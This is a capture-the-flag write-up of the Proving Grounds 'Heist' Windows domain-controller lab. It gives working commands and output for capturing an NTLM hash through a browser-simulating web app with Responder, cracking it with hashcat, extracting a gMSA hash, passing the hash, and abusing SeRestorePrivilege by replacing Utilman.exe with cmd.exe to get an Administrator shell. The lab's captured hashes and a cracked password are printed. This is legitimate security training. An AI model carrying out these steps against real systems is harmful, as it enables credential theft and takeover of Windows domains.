PG - Heist

PG – Heist

In this walk through, we will be going through the Heist room from Proving Grounds. This room is rated as Hard on the platform and it consists of capturing user NTLM hashes due to use of insecure web browser application. Moving laterally with gMSA password extraction and finally getting Admin by abusing SeRestorePrivilege. So, let’s get started without any delay.

Heist

Machine Info:

TitleHeist
IPaddress192.168.153.165
DifficultyHard
OSWindows
DescriptionHeist is a Hard Windows machine which uses capturing user NTLM hashes due to use of insecure web browser application. Moving laterally with gMSA password extraction and finally getting Admin by abusing SeRestorePrivilege.

Enumeration:

  • I started off with a regular aggressive nmap scan and full TCP port scan. Found multiple ports opened – 88 (Kerberos), 139,445 (SMB), 3268 (LDAP), 8080 (HTTP) and many more.

$ sudo nmap -A 192.168.153.165
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-12 13:05 IST

Nmap scan report for 192.168.153.165
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-12 07:36:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HEIST
|   NetBIOS_Domain_Name: HEIST
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: heist.offsec
|   DNS_Computer_Name: DC01.heist.offsec
|   DNS_Tree_Name: heist.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-02-12T07:36:26+00:00
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2023-11-14T05:10:15
|_Not valid after:  2024-05-15T05:10:15
|_ssl-date: 2024-02-12T07:37:04+00:00; 0s from scanner time.
8080/tcp open  http          Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
| vulners: 
|   cpe:/a:python:python:3.9.0: 
|     	PRION:CVE-2015-20107	8.0	https://vulners.com/prion/PRION:CVE-2015-20107
|     	CVE-2015-20107	8.0	https://vulners.com/cve/CVE-2015-20107
|     	PRION:CVE-2022-48565	7.5	https://vulners.com/prion/PRION:CVE-2022-48565
|     	PRION:CVE-2022-37454	7.5	https://vulners.com/prion/PRION:CVE-2022-37454
|     	PRION:CVE-2021-3177	7.5	https://vulners.com/prion/PRION:CVE-2021-3177
|     	PRION:CVE-2021-29921	7.5	https://vulners.com/prion/PRION:CVE-2021-29921
|     	PRION:CVE-2020-27619	7.5	https://vulners.com/prion/PRION:CVE-2020-27619
|     	PRION:CVE-2019-12900	7.5	https://vulners.com/prion/PRION:CVE-2019-12900
|     	OSV:BIT-PYTHON-2022-48565	7.5	https://vulners.com/osv/OSV:BIT-PYTHON-2022-48565
|     	OSV:BIT-PYTHON-2022-37454	7.5	https://vulners.com/osv/OSV:BIT-PYTHON-2022-37454
|     	OSV:BIT-PYTHON-2021-3177	7.5	https://vulners.com/osv/OSV:BIT-PYTHON-2021-3177
|     	OSV:BIT-PYTHON-2021-29921	7.5	https://vulners.com/osv/OSV:BIT-PYTHON-2021-29921
|     	OSV:BIT-PYTHON-2020-27619	7.5	https://vulners.com/osv/OSV:BIT-PYTHON-2020-27619
|     	CVE-2022-48565	7.5	https://vulners.com/cve/CVE-2022-48565
|     	CVE-2022-37454	7.5	https://vulners.com/cve/CVE-2022-37454
|     	CVE-2021-3177	7.5	https://vulners.com/cve/CVE-2021-3177
|     	CVE-2021-29921	7.5	https://vulners.com/cve/CVE-2021-29921
|     	CVE-2020-27619	7.5	https://vulners.com/cve/CVE-2020-27619
|     	CVE-2019-12900	7.5	https://vulners.com/cve/CVE-2019-12900
|     	PRION:CVE-2021-3737	7.1	https://vulners.com/prion/PRION:CVE-2021-3737
|     	OSV:BIT-PYTHON-2021-3737	7.1	https://vulners.com/osv/OSV:BIT-PYTHON-2021-3737
|     	CVE-2021-3737	7.1	https://vulners.com/cve/CVE-2021-3737
|     	PRION:CVE-2013-0340	6.8	https://vulners.com/prion/PRION:CVE-2013-0340
|     	PRION:CVE-2007-4559	6.8	https://vulners.com/prion/PRION:CVE-2007-4559
|     	CVE-2013-0340	6.8	https://vulners.com/cve/CVE-2013-0340
|     	CVE-2007-4559	6.8	https://vulners.com/cve/CVE-2007-4559
|     	PRION:CVE-2023-40217	5.0	https://vulners.com/prion/PRION:CVE-2023-40217
|     	PRION:CVE-2023-27043	5.0	https://vulners.com/prion/PRION:CVE-2023-27043
|     	PRION:CVE-2023-24329	5.0	https://vulners.com/prion/PRION:CVE-2023-24329
|     	PRION:CVE-2022-45061	5.0	https://vulners.com/prion/PRION:CVE-2022-45061
|     	PRION:CVE-2022-0391	5.0	https://vulners.com/prion/PRION:CVE-2022-0391
|     	PRION:CVE-2021-4189	5.0	https://vulners.com/prion/PRION:CVE-2021-4189
|     	PRION:CVE-2020-10735	5.0	https://vulners.com/prion/PRION:CVE-2020-10735
|     	PRION:CVE-2018-25032	5.0	https://vulners.com/prion/PRION:CVE-2018-25032
|     	OSV:BIT-PYTHON-2023-40217	5.0	https://vulners.com/osv/OSV:BIT-PYTHON-2023-40217
|     	OSV:BIT-PYTHON-2023-24329	5.0	https://vulners.com/osv/OSV:BIT-PYTHON-2023-24329
|     	OSV:BIT-PYTHON-2022-48566	5.0	https://vulners.com/osv/OSV:BIT-PYTHON-2022-48566
|     	OSV:BIT-PYTHON-2022-45061	5.0	https://vulners.com/osv/OSV:BIT-PYTHON-2022-45061
|     	OSV:BIT-PYTHON-2022-0391	5.0	https://vulners.com/osv/OSV:BIT-PYTHON-2022-0391
|     	OSV:BIT-PYTHON-2021-4189	5.0	https://vulners.com/osv/OSV:BIT-PYTHON-2021-4189
|     	OSV:BIT-PYTHON-2020-10735	5.0	https://vulners.com/osv/OSV:BIT-PYTHON-2020-10735
|     	DA7CD4B2-2AD0-5735-A5DE-26D392D51DDA	5.0	https://vulners.com/githubexploit/DA7CD4B2-2AD0-5735-A5DE-26D392D51DDA	*EXPLOIT*
|     	CVE-2023-40217	5.0	https://vulners.com/cve/CVE-2023-40217
|     	CVE-2023-27043	5.0	https://vulners.com/cve/CVE-2023-27043
|     	CVE-2023-24329	5.0	https://vulners.com/cve/CVE-2023-24329
|     	CVE-2022-48560	5.0	https://vulners.com/cve/CVE-2022-48560
|     	CVE-2022-45061	5.0	https://vulners.com/cve/CVE-2022-45061
|     	CVE-2022-0391	5.0	https://vulners.com/cve/CVE-2022-0391
|     	CVE-2021-4189	5.0	https://vulners.com/cve/CVE-2021-4189
|     	CVE-2020-10735	5.0	https://vulners.com/cve/CVE-2020-10735
|     	CVE-2018-25032	5.0	https://vulners.com/cve/CVE-2018-25032
|     	245D4EE1-A03B-5FCC-BDA2-DD48815E487D	5.0	https://vulners.com/githubexploit/245D4EE1-A03B-5FCC-BDA2-DD48815E487D	*EXPLOIT*
|     	0317958D-5B98-511C-908C-F9FFCF653A02	5.0	https://vulners.com/githubexploit/0317958D-5B98-511C-908C-F9FFCF653A02	*EXPLOIT*
|     	PRION:CVE-2022-26488	4.4	https://vulners.com/prion/PRION:CVE-2022-26488
|     	OSV:BIT-PYTHON-2022-26488	4.4	https://vulners.com/osv/OSV:BIT-PYTHON-2022-26488
|     	PRION:CVE-2022-48564	4.3	https://vulners.com/prion/PRION:CVE-2022-48564
|     	PRION:CVE-2022-42919	4.3	https://vulners.com/prion/PRION:CVE-2022-42919
|     	PRION:CVE-2021-28861	4.3	https://vulners.com/prion/PRION:CVE-2021-28861
|     	PRION:CVE-2016-3189	4.3	https://vulners.com/prion/PRION:CVE-2016-3189
|     	OSV:BIT-PYTHON-2022-48564	4.3	https://vulners.com/osv/OSV:BIT-PYTHON-2022-48564
|     	OSV:BIT-PYTHON-2022-42919	4.3	https://vulners.com/osv/OSV:BIT-PYTHON-2022-42919
|     	OSV:BIT-PYTHON-2021-28861	4.3	https://vulners.com/osv/OSV:BIT-PYTHON-2021-28861
|     	CVE-2022-48564	4.3	https://vulners.com/cve/CVE-2022-48564
|     	CVE-2022-42919	4.3	https://vulners.com/cve/CVE-2022-42919
|     	CVE-2021-28861	4.3	https://vulners.com/cve/CVE-2021-28861
|     	CVE-2016-3189	4.3	https://vulners.com/cve/CVE-2016-3189
|     	PRION:CVE-2021-3733	4.0	https://vulners.com/prion/PRION:CVE-2021-3733
|     	PRION:CVE-2021-23336	4.0	https://vulners.com/prion/PRION:CVE-2021-23336
|     	OSV:BIT-PYTHON-2021-3733	4.0	https://vulners.com/osv/OSV:BIT-PYTHON-2021-3733
|     	OSV:BIT-PYTHON-2021-23336	4.0	https://vulners.com/osv/OSV:BIT-PYTHON-2021-23336
|     	CVE-2021-3733	4.0	https://vulners.com/cve/CVE-2021-3733
|     	CVE-2021-23336	4.0	https://vulners.com/cve/CVE-2021-23336
|     	PRION:CVE-2021-3426	2.7	https://vulners.com/prion/PRION:CVE-2021-3426
|     	OSV:BIT-PYTHON-2021-3426	2.7	https://vulners.com/osv/OSV:BIT-PYTHON-2021-3426
|     	CVE-2021-3426	2.7	https://vulners.com/cve/CVE-2021-3426
|     	PRION:CVE-2022-48566	2.6	https://vulners.com/prion/PRION:CVE-2022-48566
|_    	CVE-2022-48566	2.6	https://vulners.com/cve/CVE-2022-48566
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): AVtech embedded (87%)
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-02-12T07:36:27
|_  start_date: N/A

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   211.36 ms 192.168.45.1
2   211.36 ms 192.168.45.254
3   211.38 ms 192.168.251.1
4   211.39 ms 192.168.153.165

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.01 seconds

nmap scan

sudo nmap -sS -p- -T5 192.168.153.165

all ports scan

  • Added the domain to my /etc/hosts file.

adding domain in /etc/hosts file

  • Enumerated the SMB shares using smbclient and smbmap with null session but found nothing.

smbclient -L 192.168.153.165

smbmap -H 192.168.153.165

SMB Enumeration

  • Next, enumerated web server on port 8080 and found a application running. The application asks for a URL and it connects with it simulating a browser.

Secure Web Browser

  • I performed a test run to see if it will connect to my netcat listener on port 1234 and surprisingly, it does.

Entering our IP address

getting connection on netcat listener

Initial Access:

  • Next, i setup Responder to capture any incoming NTLM hashes.

sudo python3 Responder.py -I tun1

Responder setup

  • Entered the Reponder listener IP on the search bar and Voila! we captured the hash successfully.

Entering Responder IP address

got enox hash

enox::HEIST:4ee71732f6a10973:C8875307B633924F6098A71D34AD36E5:01010000000000006BBF0DAF895DDA014ACB3BD3098CC21300000000020008004B0050003500540001001E00570049004E002D00550054004B004F0036004F004F005700340052004D00040014004B005000350054002E004C004F00430041004C0003003400570049004E002D00550054004B004F0036004F004F005700340052004D002E004B005000350054002E004C004F00430041004C00050014004B005000350054002E004C004F00430041004C0008003000300000000000000000000000003000002184FB7FA927C34729731C2A223CA1542BCB740A2C3C6CB8F29853E2F03C2D9C0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003100390036000000000000000000

  • Moving on, i cracked the captured hash using hashcat with the below command and got the password for user enox.

hashcat -m 5600 enox.hash ~/Desktop/Wordlist/rockyou.txt --force

cracked enox password with hashcat

  • I used the user’s password and sprayed it on the machine to gather a list of users on the domain.

crackmapexec smb 192.168.153.165 -u enox -p california --users

enumerating user with crackmapexec

  • Next, i tried to get a shell with EvilWinRM with user creds but was unable to do so at the moment, for some reason.

evil-winrm.rb -i 192.168.153.165 -u enox -p california

not got shell access

  • Moving further with my enumeration, i listed the shares accessible to user enox but found nothing interesting here as well.

crackmapexec smb 192.168.153.165 -u enox -p california --shares

Enumerating shares with crackmapexec

  • Next, i used the Bloodhound python ingestor to gather information about the domain.

$ bloodhound-python -c all -u enox -p 'california' -d heist.offsec -gc heist.offsec -dc DC01.heist.offsec
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC01.heist.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC01.heist.offsec
INFO: Found 6 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.heist.offsec
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 49S

enumerating with bloodhound-python

  • Checked for any saved creds in the description but found none.

cat 20240212140131_users.json | jq '.data[].Properties | .samaccountname + ":" + .description' -r

looking for saved creds in description

  • Next, i again checked the enox user access via WinRM and now it shows a green flag. Accessed it with EvilWinRM and i was able to get in. Strange!

crackmapexec winrm 192.168.153.165 -u enox -p california

Got Pwned in CME

got access as enox

  • Captured the local flag from our user’s Desktop.

local flag

Lateral Movement (Enox to svc_apache):

  • I peeked inside the todo file in the enox Desktop and found out that the there has to be migration done to apache of the target application.

cat todo.txt

  • Checked the information about our user enox and found out that he is part of the “Web Admins” group.

net user enox

net user enox

  • Uploaded our earlier collected data to Bloodhound to visualise the AD environment we are dealing with here. Running the query – Shortest path to Domain Admins reveals the below map. As per the map, as we are part of the Web Admins group we will be able to Read the gMSA password from SVC_APACHE and get the hash.

Shortest path to Domain Admins

  • We can check who is the part of the GMSA using the below command.

Get-ADServiceAccount -Filter * | where-object {$_.ObjectClass -eq “msDS-GroupManagedServiceAccount”}

checking the part of GMSA

gMSA Extraction

  • We will now use the below Tool to extract the hashes via gMSA.

Tools: https://github.com/expl0itabl3/Toolies

upload /home/wh1terose/CTF/PG-Play/machines/Heist/GMSAPasswordReader.exe .

extract the hashes via gMSA

*Evil-WinRM* PS C:\Users\enox\Documents> . ./GMSAPasswordReader.exe --AccountName 'svc_apache'
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 83AC7FECFBF44780E3AAF5D04DD368A5
[*]       aes128_cts_hmac_sha1 : 08E643C43F775FAC782EDBB04DD40541
[*]       aes256_cts_hmac_sha1 : 588C2BB865E771ECAADCB48ECCF4BCBCD421BF329B0133A213C83086F1A2E3D7
[*]       des_cbc_md5          : 9E340723700454E9

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 0AFF0D9DFA8B436E6688697B0A47B50C
[*]       aes128_cts_hmac_sha1 : C958BEE96DEE78F9035F460B91EC6D86
[*]       aes256_cts_hmac_sha1 : D3C18DAF21128CAFEAECE5BFF6599A0A4DFB2E9BE22F6CFE13677688B0A34988
[*]       des_cbc_md5          : 0804169DCECB6102

GMSAPasswordReader.exe

  • Once we got the svc_apache hash using the above technique, we can perform a pass the hash attack with EvilWinRM to get shell as user svc_apache.

evil-winrm.rb -i 192.168.153.165 -u svc_apache$ -H "0AFF0D9DFA8B436E6688697B0A47B50C"

got access as svc_apache

Privilege Escalation:

  • Next, we checked all the information and privileges of our current user. As per the result, our current user has SeRestrorePrivilege set.

whoami /all

whoami /all

SeRestorePrivilege Abuse

  • We can abuse the SeRestorePrivilege by renaming the cmd.exe binary to Utilman.exe and then execute it via RDP to get a shell as Administrator.

Resource: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

cd C:\Windows\system32

dir

Utilman.exe

ren Utilman.exe Utilman.old

ren cmd.exe Utilman.exe

ren cmd.exe Utilman.exe

  • Once done with the setup, use the rdesktop utility to spawn an RDP session on the target.

rdesktop 192.168.153.165

rdesktop 192.168.153.165

  • Lock the console and press Win+U. This will give us a command shell as Administrator.

got root

  • Captured the root flag and completed the machine.

proof flag

Also Read: PG – Extplorer

Conclusion:

Conclusion

So that was Heistfor you. We started off with a regular nmap scan and found multiple ports opened – 88 (Kerberos), 139,445 (SMB), 3268 (LDAP), 8080 (HTTP) and many more. Enumerated the webserver on port 8080 and found a Secure Web Browser application. Used Responder to capture the NTLM hash of user enox. Then, cracked the hash using hashcat and got the password to get the initial shell access as user enox. Enumerated the groups that enox is part of and found that it belongs to Web Admins group which can read gMSA password from SVC_APACHE and get the hash. Used the same to acccess as user svc_acpache. At last, abused the SeRestorePrivilege to get root on the system. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top